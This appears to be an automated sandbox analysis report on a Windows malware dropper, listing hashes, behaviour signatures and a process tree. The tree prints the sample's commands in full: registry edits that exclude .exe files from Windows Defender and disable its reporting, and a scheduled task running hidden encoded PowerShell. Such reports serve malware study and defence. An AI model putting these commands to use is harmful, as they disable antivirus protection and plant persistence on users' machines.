Analysis

  • max time kernel
    6s
  • max time network
    8s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    03/04/2024, 12:00

General

  • Target

    2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d.exe

  • Size

    6.5MB

  • MD5

    5ac036db54785817a366510d11fe27ff

  • SHA1

    3ad032c1efe0bb3510af47af05fc6fe799f8ef2b

  • SHA256

    2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d

  • SHA512

    eaa57362ddde75766a2f53dd4492722acdf4f5a2ff11db5ad88d0b2fe38ca7a51bc698d6cda283141ff86c5fa149b2ac6cd07adcadcb455773b41f006b7dbcd0

  • SSDEEP

    98304:91OopDcPHB7oWB0q32sghrEGog5UFI0eDyNGfJ9cnqzdmHQuuWy4rk0yaYWngUxV:91OoSKWBz3lgi+0fYLfsvry4A0y2gQHL

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d.exe
    "C:\Users\Admin\AppData\Local\Temp\2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3316
    • C:\Users\Admin\AppData\Local\Temp\7zS395F.tmp\Install.exe
      .\Install.exe /MycdidinP "385118" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:5108
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4620
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3016
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
              PID:4336
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              5⤵
                PID:1616
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3212
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1800
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                5⤵
                  PID:1020
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  5⤵
                    PID:2216
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gYVWElPOE" /SC once /ST 08:46:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Creates scheduled task(s)
                PID:4172
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gYVWElPOE"
                3⤵
                  PID:1652
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              1⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3060
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                2⤵
                  PID:4900
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                1⤵
                  PID:4700
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:4012
                  • C:\Windows\system32\gpscript.exe
                    gpscript.exe /RefreshSystemParam
                    1⤵
                      PID:3992

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\7zS395F.tmp\Install.exe

                            Filesize

                            6.9MB

                            MD5

                            ea99e72c1ac89aa9cc14178b1c46d50d

                            SHA1

                            60b896781f40e89106d0c76abd11c5b5d0832943

                            SHA256

                            9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28

                            SHA512

                            03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bujs3buf.gp2.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • memory/3060-18-0x00007FFFA4A50000-0x00007FFFA5512000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3060-19-0x000001827B380000-0x000001827B390000-memory.dmp

                            Filesize

                            64KB

                          • memory/3060-20-0x000001827B380000-0x000001827B390000-memory.dmp

                            Filesize

                            64KB

                          • memory/3060-29-0x000001827B490000-0x000001827B4B2000-memory.dmp

                            Filesize

                            136KB

                          • memory/3060-32-0x00007FFFA4A50000-0x00007FFFA5512000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5108-14-0x0000000010000000-0x00000000105E8000-memory.dmp

                            Filesize

                            5.9MB